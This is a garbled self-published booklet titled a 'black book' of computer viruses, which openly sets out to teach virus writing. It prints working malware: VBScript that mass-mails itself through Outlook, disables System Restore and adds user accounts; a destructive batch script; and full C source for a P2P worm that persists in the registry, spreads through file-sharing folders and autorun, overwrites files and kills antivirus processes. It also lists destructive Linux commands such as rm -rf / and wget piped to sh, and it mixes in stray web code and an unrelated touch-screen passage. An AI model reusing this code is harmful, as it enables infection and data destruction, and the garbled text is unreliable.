THE BIBLE of Black Book                     in             World                of     computer viruses  by Branko D. Tomic Rights of Educational Publication, Inc. Universum 2012

(c) 2012 Branko D. Tomic

All rights reserved.

Table books

Introduction 1Inside of Computer virus 2

Part I : VxersSeh 3Linux Virus 5Windows Infection 8Windows Infection – worm 16

Part II : AversLinux Security 22Windows Security 24

Introduction 1

This book will simply and plainly teach you how to write computer viruses including technical details about infection so this book is technical and to your point is to meet complete sources for plug-and-play code, to become a pro in world of virus writter's known vxer or anti-virus know also like avers programmer. Now this book will be offensive danger black book, but also is educational purposes for most people. For the next generation mentality virus would be written in a stronger encryption. Today, I' want give god-rights with respect to what they can own know, and to what they can do for their personal and financial security. This is plainly the mentality of a glory, of two way vxer way and avers way. I guess that's the only way and purpose, which survived to this book. I, will defend freedom, do what you will and what you want with this technical information about computer viruses.

Inside of Computer virus 2

Most viruses is written in vb, c, sh, py, js and pascal in this language virus is desing to generate programs, virus writter's give acrobatics information required for a virus to jump from one host program to another. It is just the only way to get excellent control over all the computer system’s resources and use them the way you want to,

rather than the way somebody else thinks you should.

This book is written to be accessible to anyone with a little

experience with language programming, or to anyone

with any programming experience, provided they’re willing to do

a little work to learn Bug in system.

If you are somewhat familiar with virus source code already, then all

you’ll need to learn new coding in step before next generation, who can jump in your source code to manipulate with virus. Before vxer represent virus,, are you ready to desinfect machine, or are you ready to make totally new strange knock out and winn against anti-virus?

Your answer is easy at the end of reading this book.

Multi-infection

Multi-infection is infection included with trojan, virus, worm and hoax which has more than one form. Typically, a multi- infection will infect files and share known bug in to another computer system. In a way, this type of virus represents best of the best worlds in virus presentation.

Part I : Vxers

SEH 3

A structure exception handler (SEH) can overwrite vulnerability in a file associated with several products could be exploited under specific circumstances and may lead to remote code execution in all platforms supported by the affected products. When virus continues by setting up a Structured Exception Handler. Virus writers some-times try to find obscure side effects of instructions in an attempt to confuse virus analysts. Sometimes they succeed (indeed, sometimes they do so accidently). Sometimes we already know about the side effects, but we just don’t talk about them. The latter is the case with the technique used in the virus.The first generation of the virus begins by fetching the value in the ImageBaseAddress field of the Process Environment Block, and applying it to the original entry point value. This allows the virus to work correctly in processes that have Address Space Layout Randomization enabled. The virus continues by setting up a Structured Exception Handler (SEH) in order to intercept any errors that occur during infection. The virus retrieves the base address of kernel32.dll by walking the InMemoryOrderModuleList from the PEB_ LDR_DATA structure in the Process Environment Block. The address of kernel32.dll is always the second entry on the list. The virus assumes that the entry is valid and that a PE header is present – a safe assumption because the SEH that the virus has registered will intercept any invalid memory access. The virus resolves the addresses of the bare minimum set of API functions that it needs for replication: find first/next, open, map, unmap, close. The virus uses hashes instead of names, but they are sorted alphabetically according to the strings they represent. The virus uses a

reverse polynomial to calculate the hash – the return of the magic ‘0xEDB88320’ value, that no-one seems to understand. Since the hashes are sorted alphabetically, the export table only needs to be parsed once for all of the APIs. Each API address is placed on the stack for easy access, but because stacks move downwards in memory, the addresses end up in reverse order. The virus also checks wher that the exports exist by limiting the parsing to the number of exports in the table. The hash table is terminated with a single byte whose value is 0x2a (the ‘*’ character). This is a convenience that allows the file mask to follow immediately in the form of ‘*.exe’, however it also prevents the use of any API whose hash ends with that value. As with previous viruses by the same author, Some virus only use ANSI APIs. And the result is that, some files cannot be opened because of the characters in their names, and thus cannot be infected.

Linux Virus 5

Insider:

• It is worthwhile to have some basic awareness about malicious commands in Linux. Today any provider in any country have spy in your private online web surfing.

• Online war for freedom never stop, and in that way virus author cann't be guilt. Then revolution against manipulation gives you some thoughts on how to "create a virus".

• When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as from readily available documentation on Linux commands (e.g. manpages).

Here are some common examples of commands that should raise a white flag of enemy. Remember thesecan always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something. Delete all files, delete current directory, or delete visible files in current directory It's quite obvious why these commands can be sweet for virus author to execute. rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, " rm -rf / " means force a deletion of everything in the root directory and all subfolders. " rm -rf . " means to force deletion of the current directory and all subfolders. " rm -rf * " means to force deletion of all files in the

current folder and all subfolders.

rm -rf / rm -rf . rm -rf *

Another variation of this, which would all force deletion of the current folder and all subfolders, would be:

rm -r .[^.]*

which will only exclude the parent directory ".." Reformat Data on device Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs mkfs.ext4 mkfs.anything

Block device manipulation These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda dd if=something of=/dev/sda

Malicious code in Shell scripts Make and give the link to a shell script (executable from the command line interface using script execution command ./ ) and recommends to download and execute it. The script might contains any command what so

ever -- whether benign or malevolent. Examples:

wget http://some_place/some_file sh ./some_file or wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed Monstrous example (in Python):

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

in which "sn!.sg!+" is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python?

if(window.mw){ mw.loader.load(["mediawiki.user","mediawiki.page.ready","ext.gadget.ZoomViewer","ext.gadget.UploadWizard","ext.gadget.Long-Image-Names-in-Categories","ext.gadget.Stockphoto","ext.gadget.ExtraTabs2","ext.gadget.WikiMiniAtlas","ext.gadget.AjaxQuickDelete","ext.vector.collapsibleNav","ext.vector.collapsibleTabs","ext.vector.simpleSearch"], null, true);

Windows Virus 8

Virus.VBS.Welcome

Virus for windows is to much easy code in world wide web and any windows OS. Windows is unsecure system who get infection from wild

place. Virus for windows, beginers can write in easy Bat – Cdm, Txt, Vbs -Js, Exe – Dll and in any other win-file. Look in vbs code easy code can execute your infection;

Dim speaks, speech, aspeaks="Im Virus, and I come from wild world"Set speech=CreateObject("sapi.spvoice")speech.Speak speaks

In this first line I give voice command, with infected information, but to hidde virus from victim eyes you need to delete vbs script, easy if is script copyrighted under start folder, give command for suicide after first start up and virus is self deleted from startup folder. Ok next command is;

Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop

This constantly makes it so the enter button is being pressed continuously. And infection at the end of line is added with “chr” for outlook application MAPI, can you learn this sweet code, yes you can but i want give you one more script code in next line much easy for your mind to update, ok lets read first this code and we go in easy coding language;

Set fso = "Scripting.FileSystem.Object" Set out = "WScript.CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")" Set ola = "CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")"Set mapi = "out.GetNam" & "eSpace(" & Chr(34) & "MAPI" & Chr(34) & ")"Set x = "mapi.Addr" & "essLists(1)"For a = 1 To x.AddressEntries.CountSet Mail = ola.CreateItem(0)Mail.to = "ola.GetNa" & "meSpace(" & Chr(34) & "MAPI" & Chr(34) & ").Addr" & "essLists(1).Ad" & "dressE" & "ntries(a)"Mail.Subject = "Check it out"Mail.Body = "Check these pics out"Set NoJoy = "Atta" & "chme" & "nts"Mail.NoJoy.Add Wscript.ScriptFullNameMail.SendNextol.Quit

Like i say, next code in vbs virus is easy:

StrText="You, ar fucked. Mada facka...."set Objvoice=CreateObject("SAPI.SpVoice")Objvoice.Speak StrText

Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"

Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD

strComputer = "." ' Local Computer

strUser = "Username"strPassword = "Password"

SET colAccounts = GETOBJECT("WinNT://" & strComputer & "")SET objUser = colAccounts.Create("user", strUser)objUser.SetPassword strPasswordobjUser.SetInfo

Virus.CDM.simple

Virus in cdm is command like batch but much more simple and easy for autorun, not need to have some hard script to enter virus inside of cdm just open your notepad or text editor and try this;

cls:Acolor 0a@echo offecho Wscript.Sleepecho Wscript.Sleep 5000>C:sleep5000.vbsecho Wscript.Sleep 3000>C:sleep3000.vbsecho Wscript.Sleep 4000>C:sleep4000.vbsecho Wscript.Sleep 2000>C:sleep2000.vbscd %systemroot%System32dirclsstart /w wscript.exe C:sleep3000.vbsecho Deleting Critical System Files...echo del *.*pauseshutdown -f -s -c "Your computer is fucked suicide. Have a nice day."exit

In cdm virus file I show you shutdown command, but another windows virus is much more danger.

By definition, a virus program is able to replicate itself. This means that the virus multiplies on a computer by making copies of itself. This replication is intentional; it is part of the virus program. In most cases, if a file that contains virus is executed or copied onto another computer, then that computer will also be "infected" by the same virus. A virus can be introduced to a computer system along with any software program. For Internet users, this threat can come from downloading files through FTP (file transfer protocol), or referencing email attachments.When a virus is introduced to a computer system, it can attach itself to, or sometimes even replace, an existing program. Thus, when the user runs the program in question, the virus is also executed. This usually happens without the user being aware of it.

A virus program contains instructions to initiate some sort of "event" that affects the infected computer. Each virus has an unique event associated with it. These events and their effects can range from harmless to devastating.

Generally, there are three main classes of viruses:

File infectors

Some file infector viruses attach themselves to program files, usually selected .COM or .EXE files. Some can infect any program for which execution is requested, including .SYS, .OVL, .PRG, and .MNU files. When the program is loaded, the virus is loaded as well. Other file infector viruses arrive as wholly-contained programs or scripts sent as an attachment to an e-mail note.

System or boot-record infectors

These viruses infect executable code found in certain system areas on a disk. They attach to the DOS boot sector on diskettes or the Master Boot Record on hard disks. A typical scenario (familiar to the author) is to receive a diskette from an innocent source that contains a boot disk virus. When your operating system is running, files on the diskette can be read without triggering the boot disk virus. However, if you leave the diskette in the drive, and then turn the computer off or reload the operating system, the computer will look first in your A drive, find the diskette with its boot disk virus, load it, and make it temporarily impossible to use your hard disk. (Allow several days for recovery.) This is why you should make sure you have a bootable disk.

Macro viruses

These are among the most common viruses, and they tend to do the least damage. Macro viruses infect your Microsoft Word application and typically insert unwanted words or phrases.

The best protection against infection is: Don't ever download everything from internet and enable read-only at any dll file in windows, also close open port.

Windows – Next Generation of Touch Screen

Ok, lets say, I want to explain infection in touch screen windows OS,

you need to make includer who plug-in virus code inside touch

command of “.dll” file. Once when victim make small touch, your infected Dynamic-link-library run in silent mode and with hoax code infect file inside system of next windows generation, infection in this way not need to come from trojan or virus, easy infection can come with worm who is represented in system like Debug file. Why debug? New windows generation want to have much more security in personal computer and vxer then need to make much-more-strong infection. I’m sure everyone knows, touch screen technology comes in various forms. The two most used touch screen build technologies are resistive and capacitive.Basically, a resistive touch screen’s working part is made out of two electrically conductive layers, separated by a small gap. When pressure is applied, the two layers touch, closing an electrical circuit. Sensors and software then do the job of calculating where that point is.

This type of touch screen will work under any type of pressure, whether you’re your fingers or an object, such as a stylus. Unfortunately, seeing as the upper part needs to bend slightly for the system to work, it means that any protective layer added on top needs to be flexible. This of course makes the screen vulnerable to high pressure, but less vulnerable to short impacts.

The other widely used type is the capacitive touchscreen. This is only made out of one working layer made of conductive material. Pressure needs to be applied by another conductor, e.g. human fingers (no styluses, sorry). A small electrical discharge is then detected and, again, sensors and software take care of the rest. The protective layer in capacitive technology is usually made of a type of glass, since it does not need to be flexible. This will make the screen more vulnerable to focused impact but less vulnerable to widely applied pressure.

Both types of screens are vulnerable to humidity, dust and oils (even the natural ones produced by the human skin).

So then, what do manufacturing companies do to protect the touch screens they make? Well, basically, not much. Apart from adding a thin, top layer, made of plastic or glass, they trust the end users to protect their investment. Some might scream to high heaven that we are being scammed by the companies which do not care for clients, only for profits. Not so true.

The problem here is balance. You have to remember that a touch screen display needs to be able to accurately detect touch while protecting the fragile working components. No one would like a touch screen that only works if hit with a small hammer.

Also, the equipment using touch screen displays is mostly made out of mobile phones, tablets etc. The current trend is to make this type of equipment small, light, comfortable and, if possible, not-expensive. Adding more protection to the touch screen may just make your phone not only heavier and thicker, but also more expensive.Also, one has to take into account that although touch screen technology is not new (it was first developed some time in the 1960s), it is still in its prime, still being experimented with.As a conclusion, your touch screen display, just like all your other electronic gadgets will survive for as long as you mind the way you use it. Treat it well and it will serve you a long time.However, how many of you have given the smallest thought to the constant damage brought by our fingers or even worse, fingernails or styluses, to the display? The normal touch screens are not meant to last forever while enduring the punishment brought on a daily basis.

Windows Infection – worm 16

WormWorm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

PayloadsMany worms that have been created are designed only to spread, and don't attempt to change the systems they pass through. However, as the Morris worm and Mydoom showed, even these "payload free" worms can cause major disruption by increasing network traffic and other unintended effects. A "payload” is code in the worm designed to do more than spread the worm–it might delete files on a host system (e.g., the ExploreZip worm), encrypt files in a cryptoviral extortion attack, or send documents via e-mail. A very common payload for worms is to install a backdoor in the infected computer to allow the creation of a "zombie" computer under control of the worm author. Networks of such machines are often referred to as botnets and are very commonly used by spam senders for sending junk email or to cloak their website's address.Spammers are therefore thought to be a source of funding for the creation of such worms, and the worm writers have been caught selling lists of IP addresses of infected machines. Others try to blackmail companies with threatened DoS attacks. I will show you easy worm code in c if you want to learn in the future, just you need to know one thingthis worm code is created in Dev-cpp revision, lets coding.

Worm.P2P.Hunatcha – known peer-to-peer worm

coming from 2010 year, today avers this known low worm presenting in anti-virus labs like trojan code. Why if worm have p2p command? Today any “windows.h” or shown port:21 is known port for trojan, but if you code in encrypted way avers never can open-source code from your worm. Author of Hunatcha worm known like undermine show us generic worm with all rights for us and we take full responsability of any damage. He give reason of this virus is to show you how works,so this is why he add that variable. alot mess but like he explain it's mostly to explain in virus. Peoples interessed in this technic should also rewrite DATA d32, in line w32. It also change register usage, but using a more advanced technic update taskkill. Ok Virus Author show us much-more and massive source code in hunatcha worm, what happen if you want to hidde trojan command from detector(scanner). Easy just find remote port who is free and not detected like danger attack in system, next your wish is to infect any disk partitionfrom “A” to “Z”. Hey, wait you need to have anti-Av-scanner against anti-virus here you go, for windows TaskKill also work and that command can hidde worm from detected script called search&destroy, another old worm command today is known like trojan, wher is problem? Name is not-problem, problem is stupid Avers who name from worm after copy-paste known like “update.exe” is type of most trojan, that is why avers detect this Hunatcha worm in type of trojan, but your next educational command is mission to hidde worm from avers.Let's look this easy worm why is created for your education.

Worm.P2P.Hunatcha:

#include <windows.h>#define PORT 21

#define VirSize (2105+1)#define LenID (7+1)const char *Inf_Drives[] = {"A:","B:","C:","D:","E:","F:","G:","H:","I:","J:","K:","L:","M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:","W:","X:","Y:","Z:",0};const char *Taskkill[] = {"av","Av","AV","defend","Defend","DEFEND","f-","F-","defense","Defense","DEFENSE","Kaspersky","KASPERSKY","kaspersky","sophos","SOPHOS","Sophos","Scanner","SCANNER","scanner","Norton","norton","NORTON","Security","SECURITY","security","Anti","ANTI","anti","SCAN","Scan","scan","Malware","MALWARE","malware","Virus","VIRUS","virus","NOD32","nod32","Nod32","Zoner","ZONER","zoner","SECUR","Secur","secur","Dr.","DR.",0}; int InfectDrives(void);int InfectFiles(void);void FindDirectory(LPCSTR DirPath);void FillArray(LPCSTR Directory); char DirArray[250000][MAX_PATH];int dircount = 0;char windir[MAX_PATH];HKEY hKey; int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ int count; char wormpath[256]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe, wormpath, 256); HKEY hKey; strcat(windir, "\\System32\\update.exe"); CopyFile(wormpath, windir, 0); RegCreateKey (HKEY_CURRENT_USER, "Software\\undermine", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\InternetRegistry",&hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\Undermine",&hKey); RegSetValueEx (hKey, "Explorer", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Kazaa\\Transfer", &hKey); RegSetValueEx (hKey, "Upload", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\My Shared Folder\\users_info.txt.exe", 0); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\video sister.avi.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\gratis.mp4.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\My Shared Folder\\info download.txt.exe", 0);

CopyFile(wormpath, "C:\\Documents and Settings\\%user%\\My Documents\\Downloads\\upload.jpg.exe", 0); MessageBox (0, "Your system need to update my new world...", "Hunatcha Informer", MB_ICONINFORMATION | MB_OK); { count = count ^ 5; } return 0;}int NeverAntiVirus(void){ int c; while(1) { for(c=0;Taskkill[c]!=0;c++) system((char *)&Taskkill[c]); Sleep(1000); } return 0;}int InfectDrives(void){ char IFile[256], NewFile[256], Autorun[256], InfFile[256]; GetSystemDirectory(IFile,sizeof(IFile)); strcat(IFile,"\\updater.exe"); int i; while(1) { for(i = 0; Inf_Drives[i]; i++) { memset(NewFile,'\0',sizeof(NewFile)); memset(Autorun,'\0',sizeof(Autorun)); memset(InfFile,'\0',sizeof(InfFile)); strcpy(NewFile,Inf_Drives[i]); strcpy(Autorun,Inf_Drives[i]); strcat(NewFile,"\\allow.exe"); strcat(Autorun,"\\autorun.inf"); if(CopyFile(IFile,NewFile,FALSE)) { // FILE *runfile = fopen(Autorun,"wb"); sprintf(InfFile,"[autorun]\r\nopen=allow.exe\r\naction=Open folder to view files\r\n"); // fputs(InfFile,runfile); // fclose(runfile); SetFileAttributes(NewFile,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); SetFileAttributes(Autorun,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); } } Sleep(2000); }}int InfectFiles(void){ WIN32_FIND_DATA w32; HANDLE fHandle; char MyFile[256]; GetModuleFileName(NULL,MyFile,sizeof(MyFile)); if((fHandle = FindFirstFile("*.*",&w32))==INVALID_HANDLE_VALUE) return 1; else { if(w32.cFileName==MyFile) goto next; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL);

CopyFile(MyFile,w32.cFileName,FALSE); next: while(FindNextFile(fHandle,&w32)) { if(w32.cFileName==MyFile) continue; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL); CopyFile(MyFile,w32.cFileName,FALSE); } FindClose(fHandle); } return 0;}void FindDirectory(LPCSTR DirPath){ WIN32_FIND_DATA FindData; HANDLE hFind; char Path[MAX_PATH]; hFind = FindFirstFile(DirPath, &FindData); do { strcpy(Path, DirPath); Path[strlen(DirPath)-1] = 0; strcat(Path, FindData.cFileName); if ((FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY || FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) && (strstr(FindData.cFileName,".")==0)) { FillArray(Path); strcat(Path,"\\*"); FindDirectory(Path); } } while (FindNextFile(hFind,&FindData)); FindClose(hFind);} void FillArray(LPCSTR Directory){ lstrcpy(DirArray[dircount],Directory); dircount++;}void p2p_spread(void){ char wormpath[MAX_PATH]; GetModuleFileName(NULL, wormpath, MAX_PATH); strcat(windir, "\\System32\\update.exe");}

Can you create this worm? You need to know, including in another c language maybe you get error code in compiled file, just take dev-cpp revision and this worm you wake-up from sleep .

Part II : Avers

Linux Security 22

How to protect Linux, Ubuntu from web attack?

Before you folow this line Remove the guest account login,then you need to make disk encryption.

1. Never use the root account for any kind of work - just for the system maintenance and only as long as you need it. Use su to obtain the root rights only transiently, when required.

2. Disable unnecessary services that you do not use. For instance, if you do not plan to access your machine remotely, disable ssh.

3. Do not use telnet, ssh, samba, ftp, desktop share. These protocols are not safe and this is why they have the better replacements. If you do need to access your computer remote, try to configure and disable(close) port.

4. Never run your own web server like Apache Tomcat as root just because you need to open the standard web port. Use iptables for the port redirection or easy for everyone enable “UFW” ufw is the best firewall for everybody.

5. Remove all examples that may come with your web server or other web-related application. They may open additional security holes.6. Be careful when saving files from suspicious sources to the shared network folders or forwarding them to friends that may have Windows machines. Word or Excel documents still may contain viruses that are harmless for you but not for your partner with Windows operating system.

Good known anti-virus in past is not need, but today what happens with all security, attack coming from all side, all packet who is downloaded from internet? I give you small help “ clamTk ” the best anti-virus for your Linux/Ubuntu OS

Windows Security 24

Windows OS is against you privacy and personal use. I' can give you small known command and good scrypt.

1. Click and enable any read-only command in DLL file.2. Protect your administrative password, protect your username with another password.3. Disable Remote Desktop.4. Disable Administrative share.5. Disable Network Connection in reg-key.6. Update your OS.7. Dont use internet security software if program dont have options for you to self block known danger port.8. Find good Firewall who have options for port, and then block any known danger port.9. Find good Av-scanner.10. Dont download program from any link, just from trusted website.11. Don't make friend-ship for chat with someone if you dont know who is. 12. Good-Luck with unsecure windows OS

Suggested Reading

1. The Giant Black Book of Computer Viruses 2. Computer Viruses, Artificial Life, And Evolution 3. Microprocessor and Peripheral Handbook, Volume I and II 4. Botnets by John Kristof 5. The Morris internet worm 1988 6. The Evolution of Viruses and Worms

CERT® Advisory CA-1989-04 WANK Worm On SPAN Network If so, it defines the system announcement message to be the banner in the program:

WARNING!!!This book including source code for live computer viruses could be extremely dangerous and educational in the hands of unsecure persons. Use anything from this book if you are working on a carefully controlled and isolated computer system. All files were found via websearches through search engines in the public domain - by myself, friends, anonymous uploaders and other contributors to the site including many of the original authors, owners, coders, document writers and etc.

There are several writings out there which deal with the personality and desires of viruswriters. Some are humorous, other are serious. Some presume that viruswriters are sick, other are trying to prove otherwise. But I've never seen a 'real' file about viruswriters. So, here's one, don't call me cracker. So, friend you'll now watch with a different look at the little virii which just trashed your harddrive, flashed your BIOS and blew up the monitor. After all, it might have been written by a REAL viruswriter, Thanks.